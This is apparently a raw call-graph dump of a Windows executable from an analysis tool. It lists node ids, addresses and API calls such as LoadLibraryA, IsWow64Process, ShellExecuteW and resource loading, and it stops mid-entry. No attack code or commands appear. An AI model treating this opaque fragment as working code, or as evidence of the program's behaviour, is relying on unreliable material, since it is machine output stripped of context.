757e8c 97557->97569 97560 757d73 97558->97560 97561 757d4e 97558->97561 97566 758189 97560->97566 97565 758087 59 API calls Mailbox 97561->97565 97564 757d56 _memmove 97564->97510 97565->97564 97567 770ff6 Mailbox 59 API calls 97566->97567 97568 758193 97567->97568 97568->97564 97570 757ea3 _memmove 97569->97570 97571 757e9a 97569->97571 97570->97564 97571->97570 97573 757faf 97571->97573 97574 757fc2 97573->97574 97576 757fbf _memmove 97573->97576 97575 770ff6 Mailbox 59 API calls 97574->97575 97575->97576 97576->97570 97578 7577c7 59 API calls 97577->97578 97579 765c05 97578->97579 97579->97519 97580->97545 97582 751016 97587 754ad2 97582->97587 97585 772f80 __cinit 67 API calls 97586 751025 97585->97586 97588 770ff6 Mailbox 59 API calls 97587->97588 97589 754ada 97588->97589 97590 75101b 97589->97590 97594 754a94 97589->97594 97590->97585 97595 754aaf 97594->97595 97596 754a9d 97594->97596 97598 754afe 97595->97598 97597 772f80 __cinit 67 API calls 97596->97597 97597->97595 97599 7577c7 59 API calls 97598->97599 97600 754b16 GetVersionExW 97599->97600 97601 757d2c 59 API calls 97600->97601 97602 754b59 97601->97602 97603 757e8c 59 API calls 97602->97603 97612 754b86 97602->97612 97604 754b7a 97603->97604 97626 757886 97604->97626 97606 754bf1 GetCurrentProcess IsWow64Process 97607 754c0a 97606->97607 97609 754c20 97607->97609 97610 754c89 GetSystemInfo 97607->97610 97608 78dc8d 97622 754c95 97609->97622 97611 754c56 97610->97611 97611->97590 97612->97606 97612->97608 97615 754c32 97618 754c95 2 API calls 97615->97618 97616 754c7d GetSystemInfo 97617 754c47 97616->97617 97617->97611 97619 754c4d FreeLibrary 97617->97619 97620 754c3a GetNativeSystemInfo 97618->97620 97619->97611 97620->97617 97623 754c2e 97622->97623 97624 754c9e LoadLibraryA 97622->97624 97623->97615 97623->97616 97624->97623 97625 754caf GetProcAddress 97624->97625 97625->97623 97627 757894 97626->97627 97628 757e8c 59 API calls 97627->97628 97629 7578a4 97628->97629 97629->97612 97630 777e93 97631 777e9f __alloc_osfhnd 97630->97631 97667 77a048 GetStartupInfoW 97631->97667 97633 777ea4 97669 778dbc GetProcessHeap 97633->97669 97635 777efc 97636 777f07 97635->97636 97752 777fe3 58 API calls 3 library calls 97635->97752 97670 779d26 97636->97670 97639 777f0d 97640 777f18 __RTC_Initialize 97639->97640 97753 777fe3 58 API calls 3 library calls 97639->97753 97691 77d812 97640->97691 97643 777f27 97644 777f33 GetCommandLineW 97643->97644 97754 777fe3 58 API calls 3 library calls 97643->97754 97710 785173 GetEnvironmentStringsW 97644->97710 97648 777f32 97648->97644 97650 777f4d 97651 777f58 97650->97651 97755 7732f5 58 API calls 3 library calls 97650->97755 97720 784fa8 97651->97720 97654 777f5e 97655 777f69 97654->97655 97756 7732f5 58 API calls 3 library calls 97654->97756 97734 77332f 97655->97734 97658 777f71 97659 777f7c __wwincmdln 97658->97659 97757 7732f5 58 API calls 3 library calls 97658->97757 97740 75492e 97659->97740 97662 777f90 97663 777f9f 97662->97663 97758 773598 58 API calls _doexit 97662->97758 97759 773320 58 API calls _doexit 97663->97759 97666 777fa4 __alloc_osfhnd 97668 77a05e 97667->97668 97668->97633 97669->97635 97760 7733c7 36 API calls 2 library calls 97670->97760 97672 779d2b 97761 779f7c InitializeCriticalSectionAndSpinCount __alloc_osfhnd 97672->97761 97674 779d30 97675 779d34 97674->97675 97763 779fca TlsAlloc 97674->97763 97762 779d9c 61 API calls 2 library calls 97675->97762 97678 779d39 97678->97639 97679 779d46 97679->97675 97680 779d51 97679->97680 97764 778a15 97680->97764 97683 779d93 97772 779d9c 61 API calls 2 library calls 97683->97772 97686 779d72 97686->97683 97688 779d78 97686->97688 97687 779d98 97687->97639 97771 779c73 58 API calls 4 library calls 97688->97771 97690 779d80 GetCurrentThreadId 97690->97639 97692 77d81e __alloc_osfhnd 97691->97692 97693 779e4b __lock 58 API calls 97692->97693 97694 77d825 97693->97694 97695 778a15 __calloc_crt 58 API calls 97694->97695 97697 77d836 97695->97697 97696 77d8a1 GetStartupInfoW 97704 77d8b6 97696->97704 97707 77d9e5 97696->97707 97697->97696 97698 77d841 __alloc_osfhnd @_EH4_CallFilterFunc@8 97697->97698 97698->97643 97699 77daad 97786 77dabd LeaveCriticalSection _doexit 97699->97786 97701 778a15 __calloc_crt 58 API calls 97701->97704 97702 77da32 GetStdHandle 97702->97707 97703 77da45 GetFileType 97703->97707 97704->97701 97705 77d904 97704->97705 97704->97707 97706 77d938 GetFileType 97705->97706 97705->97707 97784 77a06b InitializeCriticalSectionAndSpinCount 97705->97784 97706->97705 97707->97699 97707->97702 97707->97703 97785 77a06b InitializeCriticalSectionAndSpinCount 97707->97785 97711 777f43 97710->97711 97712 785184 97710->97712 97716 784d6b GetModuleFileNameW 97711->97716 97787 778a5d 58 API calls 2 library calls 97712->97787 97714 7851aa _memmove 97715 7851c0 FreeEnvironmentStringsW 97714->97715 97715->97711 97717 784d9f _wparse_cmdline 97716->97717 97719 784ddf _wparse_cmdline 97717->97719 97788 778a5d 58 API calls 2 library calls 97717->97788 97719->97650 97721 784fc1 __wsetenvp 97720->97721 97725 784fb9 97720->97725 97722 778a15 __calloc_crt 58 API calls 97721->97722 97730 784fea __wsetenvp 97722->97730 97723 785041 97724 772f95 _free 58 API calls 97723->97724 97724->97725 97725->97654 97726 778a15 __calloc_crt 58 API calls 97726->97730 97727 785066 97728 772f95 _free 58 API calls 97727->97728 97728->97725 97730->97723 97730->97725 97730->97726 97730->97727 97731 78507d 97730->97731 97789 784857 58 API calls __fclose_nolock 97730->97789 97790 779006 IsProcessorFeaturePresent 97731->97790 97733 785089 97733->97654 97735 77333b __IsNonwritableInCurrentImage 97734->97735 97813 77a711 97735->97813 97737 773359 __initterm_e 97738 772f80 __cinit 67 API calls 97737->97738 97739 773378 _doexit __IsNonwritableInCurrentImage 97737->97739 97738->97739 97739->97658 97741 754948 97740->97741 97751 7549e7 97740->97751 97742 754982 IsThemeActive 97741->97742 97816 7735ac 97742->97816 97746 7549ae 97828 754a5b SystemParametersInfoW SystemParametersInfoW 97746->97828 97748 7549ba 97829 753b4c 97748->97829 97750 7549c2 SystemParametersInfoW 97750->97751 97751->97662 97752->97636 97753->97640 97754->97648 97758->97663 97759->97666 97760->97672 97761->97674 97762->97678 97763->97679 97767 778a1c 97764->97767 97766 778a57 97766->97683 97770 77a026 TlsSetValue 97766->97770 97767->97766 97769 778a3a 97767->97769 97773 785446 97767->97773 97769->97766 97769->97767 97781 77a372 Sleep 97769->97781 97770->97686 97771->97690 97772->97687 97774 785451 97773->97774 97780 78546c 97773->97780 97775 78545d 97774->97775 97774->97780 97782 778d68 58 API calls __getptd_noexit 97775->97782 97776 78547c HeapAlloc 97779 785462 97776->97779 97776->97780 97779->97767 97780->97776 97780->97779 97783 7735e1 DecodePointer 97780->97783 97781->97769 97782->97779 97783->97780 97784->97705 97785->97707 97786->97698 97787->97714 97788->97719 97789->97730 97791 779011 97790->97791 97796 778e99 97791->97796 97795 77902c 97795->97733 97797 778eb3 _memset ___raise_securityfailure 97796->97797 97798 778ed3 IsDebuggerPresent 97797->97798 97804 77a395 SetUnhandledExceptionFilter UnhandledExceptionFilter 97798->97804 97801 778f97 ___raise_securityfailure 97805 77c836 97801->97805 97802 778fba 97803 77a380 GetCurrentProcess TerminateProcess 97802->97803 97803->97795 97804->97801 97806 77c840 IsProcessorFeaturePresent 97805->97806 97807 77c83e 97805->97807 97809 785b5a 97806->97809 97807->97802 97812 785b09 5 API calls ___raise_securityfailure 97809->97812 97811 785c3d 97811->97802 97812->97811 97814 77a714 EncodePointer 97813->97814 97814->97814 97815 77a72e 97814->97815 97815->97737 97817 779e4b __lock 58 API calls 97816->97817 97818 7735b7 DecodePointer EncodePointer 97817->97818 97881 779fb5 LeaveCriticalSection 97818->97881 97820 7549a7 97821 773614 97820->97821 97822 77361e 97821->97822 97823 773638 97821->97823 97822->97823 97882 778d68 58 API calls __getptd_noexit 97822->97882 97823->97746 97825 773628 97883 778ff6 9 API calls __fclose_nolock 97825->97883 97827 773633 97827->97746 97828->97748 97830 753b59 __ftell_nolock 97829->97830 97831 7577c7 59 API calls 97830->97831 97832 753b63 GetCurrentDirectoryW 97831->97832 97884 753778 97832->97884 97834 753b8c IsDebuggerPresent 97835 78d4ad MessageBoxA 97834->97835 97836 753b9a 97834->97836 97839 78d4c7 97835->97839 97837 753c73 97836->97837 97836->97839 97840 753bb7 97836->97840 97838 753c7a SetCurrentDirectoryW 97837->97838 97841 753c87 Mailbox 97838->97841 98094 757373 59 API calls Mailbox 97839->98094 97965 7573e5 97840->97965 97841->97750 97845 753bd5 GetFullPathNameW 97846 757d2c 59 API calls 97845->97846 97848 753c10 97846->97848 97847 78d4d7 97849 78d4ed SetCurrentDirectoryW 97847->97849 97981 760a8d 97848->97981 97849->97841 97852 753c2e 97853 753c38 97852->97853 98095 7b4c03 AllocateAndInitializeSid CheckTokenMembership FreeSid 97852->98095 97997 753a58 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 97853->97997 97856 78d50a 97856->97853 97859 78d51b 97856->97859 98096 754864 97859->98096 97860 753c42 97862 753c55 97860->97862 98005 7543db 97860->98005 98016 760b30 97862->98016 97863 78d523 98103 757f41 97863->98103 97867 753c60 97867->97837 98093 7544cb Shell_NotifyIconW _memset 97867->98093 97868 78d530 97870 78d53a 97868->97870 97871 78d55f 97868->97871 98107 757e0b 97870->98107 97872 757e0b 59 API calls 97871->97872 97874 78d55b GetForegroundWindow ShellExecuteW 97872->97874 97878 78d58f Mailbox 97874->97878 97878->97837 97881->97820 97882->97825 97883->97827 97885 7577c7 59 API calls 97884->97885 97886 75378e 97885->97886 98123 753d43 97886->98123 97888 7537ac 97889 754864 61 API calls 97888->97889 97890 7537c0 97889->97890 97891 757f41 59 API calls 97890->97891 97892 7537cd 97891->97892 98137 754f3d 97892->98137 97895 78d3ae 98208 7b97e5 97895->98208 97896 7537ee Mailbox 98161 7581a7 97896->98161 97899 78d3cd 97902 772f95 _free 58 API calls 97899->97902 97905 78d3da 97902->97905 97906 754faa 84 API calls 97905->97906 97908 78d3e3 97906->97908 97912 753ee2 59 API calls 97908->97912 97909 757f41 59 API calls 97910 75381a 97909->97910 98168 758620 97910->98168 97914 78d3fe 97912->97914 97913 75382c Mailbox 97915 757f41 59 API calls 97913->97915 97916 753ee2 59 API calls 97914->97916 97917 753852 97915->97917 97918 78d41a 97916->97918 97919 758620 69 API calls 97917->97919 97920 754864 61 API calls 97918->97920 97922 753861 Mailbox 97919->97922 97921 78d43f 97920->97921 97923 753ee2 59 API calls 97921->97923 97924 7577c7 59 API calls 97922->97924 97925 78d44b 97923->97925 97927 75387f 97924->97927 97926 7581a7 59 API calls 97925->97926 97928 78d459 97926->97928 98172 753ee2 97927->98172 97930 753ee2 59 API calls 97928->97930 97932 78d468 97930->97932 97938 7581a7 59 API calls 97932->97938 97934 753899 97934->97908 97935 7538a3 97934->97935 97936 77313d _W_store_winword 60 API calls 97935->97936 97937 7538ae 97936->97937 97937->97914 97939 7538b8 97937->97939 97940 78d48a 97938->97940 97941 77313d _W_store_winword 60 API calls 97939->97941 97942 753ee2 59 API calls 97940->97942 97943 7538c3 97941->97943 97944 78d497 97942->97944 97943->97918 97945 7538cd 97943->97945 97944->97944 97946 77313d _W_store_winword 60 API calls 97945->97946 97947 7538d8 97946->97947 97947->97932 97948 753919 97947->97948 97950 753ee2 59 API calls 97947->97950 97948->97932 97949 753926 97948->97949 98188 75942e 97949->98188 97951 7538fc 97950->97951 97953 7581a7 59 API calls 97951->97953 97955 75390a 97953->97955 97957 753ee2 59 API calls 97955->97957 97957->97948 97960 7593ea 59 API calls 97962 753961 97960->97962 97961 759040 60 API calls 97961->97962 97962->97960 97962->97961 97963 753ee2 59 API calls 97962->97963 97964 7539a7 Mailbox 97962->97964 97963->97962 97964->97834 97966 7573f2 __ftell_nolock 97965->97966 97967 78ee4b _memset 97966->97967 97968 75740b 97966->97968 97970 78ee67 GetOpenFileNameW 97967->97970 99074 7548ae 97968->99074 97972 78eeb6 97970->97972 97974 757d2c 59 API calls 97972->97974 97976 78eecb 97974->97976 97976->97976 97978 757429 99102 7569ca 97978->99102 97982 760a9a __ftell_nolock 97981->97982 99350 756ee0 97982->99350 97984 760a9f 97985 753c26 97984->97985 99361 7612fe 89 API calls 97984->99361 97985->97847 97985->97852 97987 760aac 97987->97985 99362 764047 91 API calls Mailbox 97987->99362 97989 760ab5 97989->97985 97990 760ab9 GetFullPathNameW 97989->97990 97991 757d2c 59 API calls 97990->97991 97992 760ae5 97991->97992 97993 757d2c 59 API calls 97992->97993 97994 760af2 97993->97994 97995 7950d5 _wcscat 97994->97995 97996 757d2c 59 API calls 97994->97996 97996->97985 97998 78d49c 97997->97998 97999 753ac2 LoadImageW RegisterClassExW 97997->97999 99406 7548fe LoadImageW EnumResourceNamesW 97998->99406 99405 753041 7 API calls 97999->99405 98002 753b46 98004 7539e7 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98002->98004 98003 78d4a5 98004->97860 98006 754406 _memset 98005->98006 99407 754213 98006->99407 98009 75448b 98011 7544a5 Shell_NotifyIconW 98009->98011 98012 7544c1 Shell_NotifyIconW 98009->98012 98013 7544b3 98011->98013 98012->98013 99411 75410d 98013->99411 98015 7544ba 98015->97862 98017 7950ed 98016->98017 98028 760b55 98016->98028 99466 7ba0b5 89 API calls 4 library calls 98017->99466 98019 760e5a 98019->97867 98021 761044 98021->98019 98023 761051 98021->98023 99464 7611f3 331 API calls Mailbox 98023->99464 98024 760bab PeekMessageW 98091 760b65 Mailbox 98024->98091 98026 761058 LockWindowUpdate DestroyWindow GetMessageW 98026->98019 98030 76108a 98026->98030 98028->98091 99467 759fbd 60 API calls 98028->99467 99468 7a68bf 331 API calls 98028->99468 98029 7952ab Sleep 98029->98091 98033 796082 TranslateMessage DispatchMessageW GetMessageW 98030->98033 98031 760e44 98031->98019 99463 7611d0 10 API calls Mailbox 98031->99463 98033->98033 98034 7960b2 98033->98034 98034->98019 98035 760fa3 PeekMessageW 98035->98091 98036 760fbf TranslateMessage DispatchMessageW 98036->98035 98037 79517a TranslateAcceleratorW 98037->98035 98037->98091 98038 759fbd 60 API calls 98038->98091 98039 760e73 timeGetTime 98039->98091 98040 795c49 WaitForSingleObject 98042 795c66 GetExitCodeProcess CloseHandle 98040->98042 98040->98091 98075 7610f5 98042->98075 98043 760fdd Sleep 98077 760fee Mailbox 98043->98077 98044 7581a7 59 API calls 98044->98091 98045 7577c7 59 API calls 98045->98077 98047 770ff6 59 API calls Mailbox 98047->98091 98048 795f22 Sleep 98048->98077 98050 770719 timeGetTime 98050->98077 98051 7610ae timeGetTime 99465 759fbd 60 API calls 98051->99465 98054 795fb9 GetExitCodeProcess 98056 795fcf WaitForSingleObject 98054->98056 98057 795fe5 CloseHandle 98054->98057 98056->98057 98056->98091 98057->98077 98060 7d61ac 110 API calls 98060->98077 98061 75b93d 109 API calls 98061->98077 98062 795c9e 98062->98075 98063 796041 Sleep 98063->98091 98064 7954a2 Sleep 98064->98091 98066 757f41 59 API calls 98066->98077 98070 75a000 304 API calls 98070->98091 98075->97867 98077->98045 98077->98050 98077->98054 98077->98060 98077->98061 98077->98062 98077->98063 98077->98064 98077->98066 98077->98075 98077->98091 99493 7b28f7 60 API calls 98077->99493 99494 759fbd 60 API calls 98077->99494 99495 758b13 69 API calls Mailbox 98077->99495 99496 75b89c 331 API calls 98077->99496 99497 7a6a50 60 API calls 98077->99497 99498 7b54e6 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98077->99498 99499 7b3e91 66 API calls Mailbox 98077->99499 98078 7ba0b5 89 API calls 98078->98091 98080 758620 69 API calls 98080->98091 98081 759df0 59 API calls Mailbox 98081->98091 98082 7a66f4 59 API calls Mailbox 98082->98091 98084 757f41 59 API calls 98084->98091 98085 7959ff VariantClear 98085->98091 98086 795a95 VariantClear 98086->98091 98087 758e34 59 API calls Mailbox 98087->98091 98088 795843 VariantClear 98088->98091 98089 7a7405 59 API calls 98089->98091 98090 758b13 69 API calls 98090->98091 98091->98024 98091->98029 98091->98031 98091->98035 98091->98036 98091->98037 98091->98038 98091->98039 98091->98040 98091->98043 98091->98044 98091->98047 98091->98048 98091->98051 98091->98070 98091->98075 98091->98077 98091->98078 98091->98080 98091->98081 98091->98082 98091->98084 98091->98085 98091->98086 98091->98087 98091->98088 98091->98089 98091->98090 98092 75b89c 304 API calls 98091->98092 99434 75e580 98091->99434 99441 75f5c0 98091->99441 99460 75e800 331 API calls 2 library calls 98091->99460 99461 75fe40 331 API calls 2 library calls 98091->99461 99462 7531ce IsDialogMessageW GetClassLongW 98091->99462 99469 7d629f 59 API calls 98091->99469 99470 7b9c9f 59 API calls Mailbox 98091->99470 99471 7ad9e3 59 API calls 98091->99471 99472 759997 98091->99472 99490 7a6665 59 API calls 2 library calls 98091->99490 99491 758561 59 API calls 98091->99491 99492 75843f 59 API calls Mailbox 98091->99492 98092->98091 98093->97837 98094->97847 98095->97856 98097 781b90 __ftell_nolock 98096->98097 98098 754871 GetModuleFileNameW 98097->98098 98099 757f41 59 API calls 98098->98099 98100 754897 98099->98100 98101 7548ae 60 API calls 98100->98101 98102 7548a1 Mailbox 98101->98102 98102->97863 98104 757f50 __wsetenvp _memmove 98103->98104 98105 770ff6 Mailbox 59 API calls 98104->98105 98106 757f8e 98105->98106 98106->97868 98108 757e1f 98107->98108 98109 78f173 98107->98109 99754 757db0 98108->99754 98110 758189 59 API calls 98109->98110 98113 78f17e __wsetenvp _memmove 98110->98113 98112 757e2a 98114 757c8e 98112->98114 98115 757ca0 98114->98115 98116 78f094 98114->98116 99759 757bb1 98115->99759 98124 753d50 __ftell_nolock 98123->98124 98125 757d2c 59 API calls 98124->98125 98129 753eb6 Mailbox 98124->98129 98127 753d82 98125->98127 98135 753db8 Mailbox 98127->98135 98249 757b52 98127->98249 98128 753e89 98128->98129 98130 757f41 59 API calls 98128->98130 98129->97888 98132 753eaa 98130->98132 98131 757f41 59 API calls 98131->98135 98133 753f84 59 API calls 98132->98133 98133->98129 98135->98128 98135->98129 98135->98131 98136 757b52 59 API calls 98135->98136 98252 753f84 98135->98252 98136->98135 98258 754d13 98137->98258 98142 78dd0f 98144 754faa 84 API calls 98142->98144 98143 754f68 LoadLibraryExW 98268 754cc8 98143->98268 98147 78dd16 98144->98147 98149 754cc8 3 API calls 98147->98149 98151 78dd1e 98149->98151 98150 754f8f 98150->98151 98152 754f9b 98150->98152 98294 75506b 98151->98294 98153 754faa 84 API calls 98152->98153 98155 7537e6 98153->98155 98155->97895 98155->97896 98158 78dd45 98302 755027 98158->98302 98160 78dd52 98162 7581b2 98161->98162 98163 753801 98161->98163 98732 7580d7 59 API calls 2 library calls 98162->98732 98165 7593ea 98163->98165 98166 770ff6 Mailbox 59 API calls 98165->98166 98167 75380d 98166->98167 98167->97909 98169 75862b 98168->98169 98171 758652 98169->98171 98733 758b13 69 API calls Mailbox 98169->98733 98171->97913 98173 753f05 98172->98173 98174 753eec 98172->98174 98175 757d2c 59 API calls 98173->98175 98176 7581a7 59 API calls 98174->98176 98177 75388b 98175->98177 98176->98177 98178 77313d 98177->98178 98179 7731be 98178->98179 98180 773149 98178->98180 98736 7731d0 60 API calls 3 library calls 98179->98736 98182 77316e 98180->98182 98734 778d68 58 API calls __getptd_noexit 98180->98734 98182->97934 98184 7731cb 98184->97934 98185 773155 98735 778ff6 9 API calls __fclose_nolock 98185->98735 98187 773160 98187->97934 98189 759436 98188->98189 98190 770ff6 Mailbox 59 API calls 98189->98190 98191 759444 98190->98191 98192 753936 98191->98192 98737 75935c 59 API calls Mailbox 98191->98737 98194 7591b0 98192->98194 98738 7592c0 98194->98738 98196 7591bf 98197 770ff6 Mailbox 59 API calls 98196->98197 98198 753944 98196->98198 98197->98198 98199 759040 98198->98199 98200 759057 98199->98200 98201 78f5a5 98199->98201 98203 75915f 98200->98203 98204 7591a0 98200->98204 98205 759158 98200->98205 98201->98200 98748 758d3b 59 API calls Mailbox 98201->98748 98203->97962 98747 759e9c 60 API calls Mailbox 98204->98747 98207 770ff6 Mailbox 59 API calls 98205->98207 98207->98203 98209 755045 85 API calls 98208->98209 98210 7b9854 98209->98210 98749 7b99be 98210->98749 98213 75506b 74 API calls 98214 7b9881 98213->98214 98215 75506b 74 API calls 98214->98215 98216 7b9891 98215->98216 98217 75506b 74 API calls 98216->98217 98218 7b98ac 98217->98218 98219 75506b 74 API calls 98218->98219 98220 7b98c7 98219->98220 98221 755045 85 API calls 98220->98221 98222 7b98de 98221->98222 98223 77594c __malloc_crt 58 API calls 98222->98223 98224 7b98e5 98223->98224 98225 77594c __malloc_crt 58 API calls 98224->98225 98226 7b98ef 98225->98226 98227 75506b 74 API calls 98226->98227 98228 7b9903 98227->98228 98229 7b9393 GetSystemTimeAsFileTime 98228->98229 98230 7b9916 98229->98230 98231 7b992b 98230->98231 98232 7b9940 98230->98232 98233 772f95 _free 58 API calls 98231->98233 98234 7b9946 98232->98234 98235 7b99a5 98232->98235 98238 7b9931 98233->98238 98755 7b8d90 98234->98755 98237 772f95 _free 58 API calls 98235->98237 98242 78d3c1 98237->98242 98240 772f95 _free 58 API calls 98238->98240 98240->98242 98241 772f95 _free 58 API calls 98241->98242 98242->97899 98243 754faa 98242->98243 98244 754fb4 98243->98244 98245 754fbb 98243->98245 98246 7755d6 __fcloseall 83 API calls 98244->98246 98247 754fdb FreeLibrary 98245->98247 98248 754fca 98245->98248 98246->98245 98247->98248 98248->97899 98250 757faf 59 API calls 98249->98250 98251 757b5d 98250->98251 98251->98127 98253 753f92 98252->98253 98257 753fb4 _memmove 98252->98257 98256 770ff6 Mailbox 59 API calls 98253->98256 98254 770ff6 Mailbox 59 API calls 98255 753fc8 98254->98255 98255->98135 98256->98257 98257->98254 98307 754d61 98258->98307 98261 754d53 98265 77548b 98261->98265 98262 754d4a FreeLibrary 98262->98261 98263 754d61 2 API calls 98264 754d3a 98263->98264 98264->98261 98264->98262 98311 7754a0 98265->98311 98267 754f5c 98267->98142 98267->98143 98469 754d94 98268->98469 98271 754cff FreeLibrary 98272 754d08 98271->98272 98275 754dd0 98272->98275 98273 754d94 2 API calls 98274 754ced 98273->98274 98274->98271 98274->98272 98276 770ff6 Mailbox 59 API calls 98275->98276 98277 754de5 98276->98277 98473 75538e 98277->98473 98279 754df1 _memmove 98280 754e2c 98279->98280 98281 754f21 98279->98281 98282 754ee9 98279->98282 98283 755027 69 API calls 98280->98283 98487 7b9ba5 95 API calls 98281->98487 98476 754fe9 CreateStreamOnHGlobal 98282->98476 98291 754e35 98283->98291 98286 75506b 74 API calls 98286->98291 98287 754ec9 98287->98150 98289 78dcd0 98290 755045 85 API calls 98289->98290 98292 78dce4 98290->98292 98291->98286 98291->98287 98291->98289 98482 755045 98291->98482 98293 75506b 74 API calls 98292->98293 98293->98287 98295 75507d 98294->98295 98296 78ddf6 98294->98296 98511 775812 98295->98511 98299 7b9393 98709 7b91e9 98299->98709 98301 7b93a9 98301->98158 98303 78ddb9 98302->98303 98304 755036 98302->98304 98714 775e90 98304->98714 98306 75503e 98306->98160 98308 754d2e 98307->98308 98309 754d6a LoadLibraryA 98307->98309 98308->98263 98308->98264 98309->98308 98310 754d7b GetProcAddress 98309->98310 98310->98308 98314 7754ac __alloc_osfhnd 98311->98314 98312 7754bf 98360 778d68 58 API calls __getptd_noexit 98312->98360 98314->98312 98316 7754f0 98314->98316 98315 7754c4 98361 778ff6 9 API calls __fclose_nolock 98315->98361 98330 780738 98316->98330 98319 7754f5 98320 7754fe 98319->98320 98321 77550b 98319->98321 98362 778d68 58 API calls __getptd_noexit 98320->98362 98323 775535 98321->98323 98324 775515 98321->98324 98345 780857 98323->98345 98363 778d68 58 API calls __getptd_noexit 98324->98363 98325 7754cf __alloc_osfhnd @_EH4_CallFilterFunc@8 98325->98267 98331 780744 __alloc_osfhnd 98330->98331 98332 779e4b __lock 58 API calls 98331->98332 98342 780752 98332->98342 98333 7807c6 98365 78084e 98333->98365 98334 7807cd 98370 778a5d 58 API calls 2 library calls 98334->98370 98337 780843 __alloc_osfhnd 98337->98319 98338 7807d4 98338->98333 98371 77a06b InitializeCriticalSectionAndSpinCount 98338->98371 98341 779ed3 __mtinitlocknum 58 API calls 98341->98342 98342->98333 98342->98334 98342->98341 98368 776e8d 59 API calls __lock 98342->98368 98369 776ef7 LeaveCriticalSection LeaveCriticalSection _doexit 98342->98369 98343 7807fa EnterCriticalSection 98343->98333 98346 780877 __wopenfile 98345->98346 98347 780891 98346->98347 98359 780a4c 98346->98359 98378 773a0b 60 API calls 2 library calls 98346->98378 98376 778d68 58 API calls __getptd_noexit 98347->98376 98349 780896 98377 778ff6 9 API calls __fclose_nolock 98349->98377 98351 780aaf 98373 7887f1 98351->98373 98352 775540 98364 775562 LeaveCriticalSection LeaveCriticalSection _fprintf 98352->98364 98355 780a45 98355->98359 98379 773a0b 60 API calls 2 library calls 98355->98379 98357 780a64 98357->98359 98380 773a0b 60 API calls 2 library calls 98357->98380 98359->98347 98359->98351 98360->98315 98361->98325 98362->98325 98363->98325 98364->98325 98372 779fb5 LeaveCriticalSection 98365->98372 98367 780855 98367->98337 98368->98342 98369->98342 98370->98338 98371->98343 98372->98367 98381 787fd5 98373->98381 98375 78880a 98375->98352 98376->98349 98377->98352 98378->98355 98379->98357 98380->98359 98382 787fe1 __alloc_osfhnd 98381->98382 98383 787ff7 98382->98383 98385 78802d 98382->98385 98466 778d68 58 API calls __getptd_noexit 98383->98466 98392 78809e 98385->98392 98386 787ffc 98467 778ff6 9 API calls __fclose_nolock 98386->98467 98389 788049 98468 788072 LeaveCriticalSection __unlock_fhandle 98389->98468 98391 788006 __alloc_osfhnd 98391->98375 98393 7880be 98392->98393 98394 77471a __wsopen_nolock 58 API calls 98393->98394 98397 7880da 98394->98397 98395 779006 __invoke_watson 8 API calls 98396 7887f0 98395->98396 98398 787fd5 __wsopen_helper 103 API calls 98396->98398 98399 788114 98397->98399 98406 788137 98397->98406 98465 788211 98397->98465 98401 78880a 98398->98401 98400 778d34 __dosmaperr 58 API calls 98399->98400 98402 788119 98400->98402 98401->98389 98403 778d68 __fclose_nolock 58 API calls 98402->98403 98404 788126 98403->98404 98407 778ff6 __fclose_nolock 9 API calls 98404->98407 98405 7881f5 98408 778d34 __dosmaperr 58 API calls 98405->98408 98406->98405 98413 7881d3 98406->98413 98409 788130 98407->98409 98410 7881fa 98408->98410 98409->98389 98411 778d68 __fclose_nolock 58 API calls 98410->98411 98412 788207 98411->98412 98414 778ff6 __fclose_nolock 9 API calls 98412->98414 98415 77d4d4 __alloc_osfhnd 61 API calls 98413->98415 98414->98465 98416 7882a1 98415->98416 98417 7882ab 98416->98417 98418 7882ce 98416->98418 98420 778d34 __dosmaperr 58 API calls 98417->98420 98419 787f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98418->98419 98430 7882f0 98419->98430 98421 7882b0 98420->98421 98422 778d68 __fclose_nolock 58 API calls 98421->98422 98424 7882ba 98422->98424 98423 78836e GetFileType 98425 788379 GetLastError 98423->98425 98426 7883bb 98423->98426 98428 778d68 __fclose_nolock 58 API calls 98424->98428 98429 778d47 __dosmaperr 58 API calls 98425->98429 98435 77d76a __set_osfhnd 59 API calls 98426->98435 98427 78833c GetLastError 98431 778d47 __dosmaperr 58 API calls 98427->98431 98428->98409 98433 7883a0 CloseHandle 98429->98433 98430->98423 98430->98427 98434 787f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98430->98434 98432 788361 98431->98432 98439 778d68 __fclose_nolock 58 API calls 98432->98439 98433->98432 98436 7883ae 98433->98436 98437 788331 98434->98437 98438 7883d9 98435->98438 98440 778d68 __fclose_nolock 58 API calls 98436->98440 98437->98423 98437->98427 98442 788594 98438->98442 98443 781b11 __lseeki64_nolock 60 API calls 98438->98443 98460 78845a 98438->98460 98439->98465 98441 7883b3 98440->98441 98441->98432 98444 788767 CloseHandle 98442->98444 98442->98465 98445 788443 98443->98445 98446 787f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 98444->98446 98448 778d34 __dosmaperr 58 API calls 98445->98448 98445->98460 98447 78878e 98446->98447 98449 7887c2 98447->98449 98450 788796 GetLastError 98447->98450 98448->98460 98449->98465 98451 778d47 __dosmaperr 58 API calls 98450->98451 98454 7887a2 98451->98454 98452 78848c 98457 7899f2 __chsize_nolock 82 API calls 98452->98457 98452->98460 98453 781b11 60 API calls __lseeki64_nolock 98453->98460 98458 77d67d __free_osfhnd 59 API calls 98454->98458 98455 780d2d __close_nolock 61 API calls 98455->98460 98456 7810ab 70 API calls __read_nolock 98456->98460 98457->98452 98458->98449 98459 77dac6 __write 78 API calls 98459->98460 98460->98442 98460->98452 98460->98453 98460->98455 98460->98456 98460->98459 98461 788611 98460->98461 98462 780d2d __close_nolock 61 API calls 98461->98462 98463 788618 98462->98463 98464 778d68 __fclose_nolock 58 API calls 98463->98464 98464->98465 98465->98395 98466->98386 98467->98391 98468->98391 98470 754ce1 98469->98470 98471 754d9d LoadLibraryA 98469->98471 98470->98273 98470->98274 98471->98470 98472 754dae GetProcAddress 98471->98472 98472->98470 98474 770ff6 Mailbox 59 API calls 98473->98474 98475 7553a0 98474->98475 98475->98279 98477 755020 98476->98477 98478 755003 FindResourceExW 98476->98478 98477->98280 98478->98477 98479 78dd5c LoadResource 98478->98479 98479->98477 98480 78dd71 SizeofResource 98479->98480 98480->98477 98481 78dd85 LockResource 98480->98481 98481->98477 98483 755054 98482->98483 98484 78ddd4 98482->98484 98488 775a7d 98483->98488 98486 755062 98486->98291 98487->98280 98491 775a89 